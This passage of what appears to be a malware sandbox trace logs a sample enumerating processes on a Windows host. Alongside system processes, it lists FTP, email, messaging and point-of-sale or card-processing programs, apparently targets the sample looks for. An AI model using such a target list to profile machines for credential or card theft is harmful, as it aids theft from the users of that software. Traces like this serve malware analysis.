lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.640] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.642] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.644] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.646] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.648] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.650] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.652] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.766] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.768] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.770] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.772] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.774] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.776] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.832] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.834] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.836] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.838] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.844] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.846] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.849] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0241.851] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0241.853] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.855] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.858] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0241.860] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0241.862] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0241.864] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.866] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0241.868] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0241.870] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.922] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.925] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0241.927] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0241.929] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0241.931] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0241.933] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0241.935] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0241.937] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0241.939] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0241.941] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0241.943] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0241.945] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0241.947] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0241.949] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0241.951] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0241.953] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0241.954] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0241.956] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0241.959] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0241.960] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0241.962] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0241.964] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0241.982] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0241.984] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0241.987] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0241.989] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0241.992] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0241.994] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0241.997] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0242.007] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0242.014] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0242.018] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0242.022] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0242.026] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0242.117] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0242.119] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0242.121] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0242.192] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0242.194] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0242.196] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0242.198] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0242.200] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0242.204] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0242.206] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0242.208] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0242.210] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0242.211] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0242.213] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0242.219] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0242.220] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0242.222] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0242.223] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0242.225] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 